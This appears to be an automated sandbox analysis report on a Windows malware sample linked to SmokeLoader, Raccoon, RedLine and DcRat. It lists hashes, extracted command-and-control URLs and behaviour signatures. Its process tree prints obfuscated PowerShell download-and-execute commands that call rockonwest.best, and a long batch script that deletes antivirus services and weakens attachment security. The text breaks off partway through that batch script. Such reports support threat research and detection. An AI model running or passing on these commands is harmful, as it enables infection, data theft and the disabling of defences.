Analysis
max time kernel: 129s
max time network: 163s
platform: windows10_x64
resource: win10v20210408
submitted: 12-08-2021 17:31

Static task: static1
Behavioral task: behavioral1
  Sample: 89c3336ea6ed1ad75668c067912e7305.exe
  Resource: win7v20210410
Behavioral task: behavioral2
  Sample: 89c3336ea6ed1ad75668c067912e7305.exe
  Resource: win10v20210408

General
Target: 89c3336ea6ed1ad75668c067912e7305.exe
Size: 319KB
MD5: 89c3336ea6ed1ad75668c067912e7305
SHA1: 2de13b667bbca2e1f0f4477007a644c09a86e533
SHA256: aaa3cda8d3f4bc7ff94a3e4f0fd37aced9d484b663bc15f198e6e25482f60443
SHA512: 10226b86087eeb0d2b878fcec69b5fae7dc28ba16260cf5bc31cfb6af1f2c2ddcbcadca3c9fea5a4fcdbf983e00a734c746e0ae9a1b3ea424c1bd921198faa28
Malware Config
Extracted
https://www.rockonwest.best/Api/GetFile2
Extracted
smokeloader
2020
http://readinglistforjuly1.xyz/
http://readinglistforjuly2.xyz/
http://readinglistforjuly3.xyz/
http://readinglistforjuly4.xyz/
http://readinglistforjuly5.xyz/
http://readinglistforjuly6.xyz/
http://readinglistforjuly7.xyz/
http://readinglistforjuly8.xyz/
http://readinglistforjuly9.xyz/
http://readinglistforjuly10.xyz/
http://readinglistforjuly1.site/
http://readinglistforjuly2.site/
http://readinglistforjuly3.site/
http://readinglistforjuly4.site/
http://readinglistforjuly5.site/
http://readinglistforjuly6.site/
http://readinglistforjuly7.site/
http://readinglistforjuly8.site/
http://readinglistforjuly9.site/
http://readinglistforjuly10.site/
http://readinglistforjuly1.club/
http://readinglistforjuly2.club/
http://readinglistforjuly3.club/
http://readinglistforjuly4.club/
http://readinglistforjuly5.club/
http://readinglistforjuly6.club/
http://readinglistforjuly7.club/
http://readinglistforjuly8.club/
http://readinglistforjuly9.club/
http://readinglistforjuly10.club/
Extracted
raccoon
cd8dc1031358b1aec55cc6bc447df1018b068607
-
url4cnc
https://telete.in/jagressor_kz
Extracted
raccoon
471c70de3b4f9e4d493e418d1f60a90659057de0
-
url4cnc
https://telete.in/p1rosto100xx
Signatures
-
DcRat
DarkCrystal (DC) is a .NET RAT, active since June 2019, that can load additional plugins.
-
Detected phishing page
-
Process spawned unexpected child process 6 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
description pid pid_target process target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1492 2628 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3292 2628 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4052 2628 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2248 2628 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2224 2628 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3880 2628 schtasks.exe
-
Raccoon Stealer Payload 5 IoCs
Processes:
resource yara_rule
behavioral2/memory/2172-169-0x0000000000BF0000-0x0000000000C81000-memory.dmp family_raccoon
behavioral2/memory/2172-170-0x0000000000400000-0x0000000000946000-memory.dmp family_raccoon
behavioral2/memory/4708-282-0x0000000000400000-0x0000000000495000-memory.dmp family_raccoon
behavioral2/memory/4708-283-0x000000000044003F-mapping.dmp family_raccoon
behavioral2/memory/4708-285-0x0000000000400000-0x0000000000495000-memory.dmp family_raccoon
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
-
Processes:
resource yara_rule
C:\Users\Admin\AppData\Local\Temp\E556.exe dcrat (×2)
C:\reviewbrokercrtCommon\reviewbrokercrtCommonsessionperfDll.exe dcrat (×2)
C:\Windows\System32\msaudite\dwm.exe dcrat (×2)
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Blocklisted process makes network request 1 IoCs
Processes:
flow pid process
1004 4484 powershell.exe
-
Downloads MZ/PE file
-
Executes dropped EXE 12 IoCs
Processes:
pid process
192 E38F.exe
2952 E556.exe
1104 E864.exe
3640 EAC6.exe
2072 Runtimebroker.exe
1128 F97D.exe
2172 FE6F.exe
4060 reviewbrokercrtCommonsessionperfDll.exe
2324 Runtimebroker_new.exe
3028 Runtimebroker.exe
4280 dwm.exe
4708 EAC6.exe
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
description ioc process
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion F97D.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion F97D.exe
-
Deletes itself 1 IoCs
Processes:
pid process
3016
-
Drops startup file 3 IoCs
Processes:
description ioc process
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchostsw.exe cmd.exe
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchostsw.exe cmd.exe
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound device.lnk Runtimebroker.exe
-
Loads dropped DLL 6 IoCs
Processes:
pid process
2172 FE6F.exe (×5)
4708 EAC6.exe
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk, where infostealers often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials and similar secrets.
-
Processes:
resource yara_rule
C:\Users\Admin\AppData\Local\Temp\F97D.exe themida (×2)
behavioral2/memory/1128-154-0x0000000000F50000-0x0000000000F51000-memory.dmp themida
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 7 IoCs
Processes:
description ioc process
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sihost = "\"C:\\Windows\\System32\\MPG4DECD\\sihost.exe\"" reviewbrokercrtCommonsessionperfDll.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Windows\\System32\\msaudite\\dwm.exe\"" reviewbrokercrtCommonsessionperfDll.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OfficeClickToRun = "\"C:\\Boot\\et-EE\\OfficeClickToRun.exe\"" reviewbrokercrtCommonsessionperfDll.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\reviewbrokercrtCommonsessionperfDll = "\"C:\\reviewbrokercrtCommon\\kB5VrhbV\\reviewbrokercrtCommonsessionperfDll.exe\"" reviewbrokercrtCommonsessionperfDll.exe
Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\Sound device = "Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile(('https://www.rockonwest.best/Ru'+'nti'+'m'+'ebr'+'oke'+'r.exe'),($env:TEMP+'\\Vp'+'nm.e'+'xe'));Start-Process ($env:TEMP+'\\V'+'pn'+'m.exe')" powershell.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\Documents and Settings\\sppsvc.exe\"" reviewbrokercrtCommonsessionperfDll.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ShellExperienceHost = "\"C:\\Windows\\SystemApps\\ShellExperienceHost_cw5n1h2txyewy\\AppxBlockMap\\ShellExperienceHost.exe\"" reviewbrokercrtCommonsessionperfDll.exe
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
description ioc process
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA F97D.exe
-
Drops file in System32 directory 4 IoCs
Processes:
description ioc process
File created C:\Windows\System32\msaudite\6cb0b6c459d5d3455a3da700e713f2e2529862ff reviewbrokercrtCommonsessionperfDll.exe
File created C:\Windows\System32\MPG4DECD\sihost.exe reviewbrokercrtCommonsessionperfDll.exe
File created C:\Windows\System32\MPG4DECD\66fc9ff0ee96c2b21f0cfded48750ae9e3032bf3 reviewbrokercrtCommonsessionperfDll.exe
File created C:\Windows\System32\msaudite\dwm.exe reviewbrokercrtCommonsessionperfDll.exe
-
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
pid process
1128 F97D.exe
-
Suspicious use of SetThreadContext 2 IoCs
Processes:
description pid process target process
PID 3260 set thread context of 2160 3260 89c3336ea6ed1ad75668c067912e7305.exe 89c3336ea6ed1ad75668c067912e7305.exe
PID 3640 set thread context of 4708 3640 EAC6.exe EAC6.exe
-
Drops file in Windows directory 2 IoCs
Processes:
description ioc process
File created C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxBlockMap\ShellExperienceHost.exe reviewbrokercrtCommonsessionperfDll.exe
File created C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxBlockMap\f8c8f1285d826bc63910aaf97db97186ba642b4f reviewbrokercrtCommonsessionperfDll.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
pid pid_target process target process
5108 4708 WerFault.exe EAC6.exe
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
description ioc process
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 89c3336ea6ed1ad75668c067912e7305.exe
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 89c3336ea6ed1ad75668c067912e7305.exe
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 89c3336ea6ed1ad75668c067912e7305.exe
-
Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
pid process
1492 schtasks.exe
3292 schtasks.exe
4052 schtasks.exe
2248 schtasks.exe
2224 schtasks.exe
3880 schtasks.exe
-
Modifies registry class 2 IoCs
Processes:
description ioc process
Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings E556.exe
Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings reviewbrokercrtCommonsessionperfDll.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
pid process
2160 89c3336ea6ed1ad75668c067912e7305.exe (×2)
3016 (×62)
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process
3016
-
Suspicious behavior: MapViewOfSection 19 IoCs
Processes:
pid process
2160 89c3336ea6ed1ad75668c067912e7305.exe
3016 (×18)
-
Suspicious use of AdjustPrivilegeToken 54 IoCs
Processes:
description pid process
Token: SeShutdownPrivilege 3016
Token: SeCreatePagefilePrivilege 3016
Token: SeShutdownPrivilege 3016
Token: SeCreatePagefilePrivilege 3016
Token: SeShutdownPrivilege 3016
Token: SeCreatePagefilePrivilege 3016
Token: SeShutdownPrivilege 3016
Token: SeCreatePagefilePrivilege 3016
Token: SeShutdownPrivilege 3016
Token: SeCreatePagefilePrivilege 3016
Token: SeShutdownPrivilege 3016
Token: SeCreatePagefilePrivilege 3016
Token: SeShutdownPrivilege 3016
Token: SeCreatePagefilePrivilege 3016
Token: SeShutdownPrivilege 3016
Token: SeCreatePagefilePrivilege 3016
Token: SeShutdownPrivilege 3016
Token: SeCreatePagefilePrivilege 3016
Token: SeShutdownPrivilege 3016
Token: SeCreatePagefilePrivilege 3016
Token: SeShutdownPrivilege 3016
Token: SeCreatePagefilePrivilege 3016
Token: SeShutdownPrivilege 3016
Token: SeCreatePagefilePrivilege 3016
Token: SeDebugPrivilege 4060 reviewbrokercrtCommonsessionperfDll.exe
Token: SeDebugPrivilege 1128 F97D.exe
Token: SeShutdownPrivilege 3016
Token: SeCreatePagefilePrivilege 3016
Token: SeDebugPrivilege 2192 powershell.exe
Token: SeDebugPrivilege 4280 dwm.exe
Token: SeShutdownPrivilege 3016
Token: SeCreatePagefilePrivilege 3016
Token: SeDebugPrivilege 4484 powershell.exe
Token: SeDebugPrivilege 3640 EAC6.exe
Token: SeDebugPrivilege 4892 powershell.exe
Token: SeRestorePrivilege 5108 WerFault.exe
Token: SeBackupPrivilege 5108 WerFault.exe
Token: SeDebugPrivilege 5108 WerFault.exe
Token: SeShutdownPrivilege 3016
Token: SeCreatePagefilePrivilege 3016
Token: SeShutdownPrivilege 3016
Token: SeCreatePagefilePrivilege 3016
Token: SeShutdownPrivilege 3016
Token: SeCreatePagefilePrivilege 3016
Token: SeShutdownPrivilege 3016
Token: SeCreatePagefilePrivilege 3016
Token: SeShutdownPrivilege 3016
Token: SeCreatePagefilePrivilege 3016
Token: SeShutdownPrivilege 3016
Token: SeCreatePagefilePrivilege 3016
Token: SeShutdownPrivilege 3016
Token: SeCreatePagefilePrivilege 3016
Token: SeShutdownPrivilege 3016
Token: SeCreatePagefilePrivilege 3016
-
Suspicious use of UnmapMainImage 1 IoCs
Processes:
pid process
3016
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
description pid process target process
PID 3260 wrote to memory of 2160 3260 89c3336ea6ed1ad75668c067912e7305.exe 89c3336ea6ed1ad75668c067912e7305.exe (×6)
PID 3016 wrote to memory of 192 3016 E38F.exe (×3)
PID 3016 wrote to memory of 2952 3016 E556.exe (×3)
PID 3016 wrote to memory of 1104 3016 E864.exe (×3)
PID 3016 wrote to memory of 3640 3016 EAC6.exe (×3)
PID 2952 wrote to memory of 3880 2952 E556.exe WScript.exe (×3)
PID 192 wrote to memory of 2072 192 E38F.exe Runtimebroker.exe (×3)
PID 3016 wrote to memory of 1128 3016 F97D.exe (×3)
PID 3016 wrote to memory of 2172 3016 FE6F.exe (×3)
PID 3016 wrote to memory of 1628 3016 explorer.exe (×4)
PID 3880 wrote to memory of 2848 3880 WScript.exe cmd.exe (×3)
PID 3016 wrote to memory of 188 3016 explorer.exe (×3)
PID 3016 wrote to memory of 3008 3016 explorer.exe (×4)
PID 2848 wrote to memory of 4060 2848 cmd.exe reviewbrokercrtCommonsessionperfDll.exe (×2)
PID 1104 wrote to memory of 1540 1104 E864.exe cmd.exe (×3)
PID 3016 wrote to memory of 1256 3016 explorer.exe (×3)
PID 3016 wrote to memory of 2220 3016 explorer.exe (×4)
PID 2072 wrote to memory of 2324 2072 Runtimebroker.exe Runtimebroker_new.exe (×3)
PID 3016 wrote to memory of 508 3016 explorer.exe (×3)
PID 2324 wrote to memory of 3028 2324 Runtimebroker_new.exe Runtimebroker.exe (×2)
Processes
-
C:\Users\Admin\AppData\Local\Temp\89c3336ea6ed1ad75668c067912e7305.exe"C:\Users\Admin\AppData\Local\Temp\89c3336ea6ed1ad75668c067912e7305.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\89c3336ea6ed1ad75668c067912e7305.exe"C:\Users\Admin\AppData\Local\Temp\89c3336ea6ed1ad75668c067912e7305.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\E38F.exeC:\Users\Admin\AppData\Local\Temp\E38F.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\Runtimebroker.exe"C:\ProgramData\Runtimebroker.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\Runtimebroker_new.exe"C:\ProgramData\Runtimebroker_new.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\Runtimebroker.exe"C:\ProgramData\Runtimebroker.exe"4⤵
- Executes dropped EXE
- Drops startup file
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''https://www.rockonwest.best/Ru''+''nti''+''m''+''ebr''+''oke''+''r.exe''),($env:TEMP+''\Vp''+''nm.e''+''xe''));Start-Process ($env:TEMP+''\V''+''pn''+''m.exe'')'5⤵
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell $dll =[Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData('https://www.rockonwest.best/Api/GetFile2'));$theType = $dll.GetType('filedll.Program');$method = $theType.GetMethod('Start');$method.Invoke([System.Activator]::CreateInstance($theType),@());rv dll,theType,method5⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" @echo off Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE2.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE1.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP18.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP17.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP16.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP15.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP14.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP13.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP12.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP11.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP10.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MBAMService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAWFwk" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MSK80Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAPExe" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McBootDelayStartSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mccspsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfefire" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\HomeNetSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ModuleCoreService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McMPFSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mcpltsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McProxy" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McODS" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfemms" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAfee SiteAdvisor Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfevtp" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McNaiAnn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\nanosvc" /f Reg Delete 
"HKLM\SYSTEM\CurrentControlSet\services\NortonSecurity" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\!SASCORE" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\SBAMSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVAuxSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVCoreSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\QHActiveDefense" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Firewall" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVG Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirMailService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\Avira.ServiceHost" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirWebService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirSchedulerService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsservppl" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ProductAgentService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsserv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\updatesrv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdAgent" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdvirth" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\DragonUpdater" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ekrn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\0247141531883172mcinstcleanup" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\PEFService" /f set "osX=%PROCESSOR_ARCHITECTURE%" if defined PROCESSOR_ARCHITEW6432 set "osX=AMD64" if "%osX%"=="x86" ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t 
REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg64.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlservice.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d 
"%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -boot" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f ) else ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f /reg:64 Reg Add 
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg64.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlservice.exe" /f /reg:32 Reg Add 
